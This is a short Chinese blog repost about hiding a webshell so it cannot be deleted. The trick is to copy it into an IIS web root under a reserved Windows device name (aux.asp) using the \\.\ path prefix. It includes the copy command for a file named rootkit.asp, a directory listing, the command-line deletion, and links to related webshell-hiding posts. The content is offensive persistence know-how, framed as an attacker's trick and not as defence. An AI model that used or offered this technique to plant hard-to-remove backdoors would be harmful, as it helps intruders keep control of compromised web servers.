利用系统保留文件名创建无法删除的webshell

2010, April 30, 8:44 AM. 网文集萃
Submitted by admin

Windows 下不能够以下面这些字样来命名文件/文件夹,包括:“aux”,“com1”“com2”“prn”“con”和“nul”等,但是通过cmd下是可以创建此类文件夹的,使用copy命令即可实现:

D:\wwwroot>copy rootkit.asp \\.\D:\\wwwroot\aux.asp
已复制         1 个文件。


D:\AspWebServer\wwwroot>dir
驱动器 D 中的卷没有标签。
卷的序列号是 4A56-1D29

D:\AspWebServer\wwwroot 的目录

2010-04-25  14:41    <DIR>          .
2010-04-25  14:41    <DIR>          ..
2010-03-08  22:50            42,756 aux.asp
2005-05-02  03:02             9,083 index.asp
2010-03-08  22:50            42,756 rootkit.asp
               3 个文件         94,595 字节
               2 个目录  3,307,204,608 可用字节
这类文件无法在图形界面删除,

只能在命令行下删除:

D:\wwwroot>del \\.\D:\wwwroot\aux.asp

D:\wwwroot>
然而在IIS中,这种文件又是可以解析成功的。

网络收集,供大家参考

Tags: webshell

« 上一篇 | 下一篇 »

只显示10条记录相关文章
利用图片隐藏ASP WebShell一句话后门 (浏览: 12130, 评论: 0)
手工注入,后台另类拿webshell搞定影院系统 (浏览: 8508, 评论: 0)
ECShop网店系统V2.6.2 后台拿webshell漏洞 (浏览: 20734, 评论: 1)
带后门webshell照样用 (浏览: 10830, 评论: 0)
三种隐藏Webshell的方法 (浏览: 7531, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):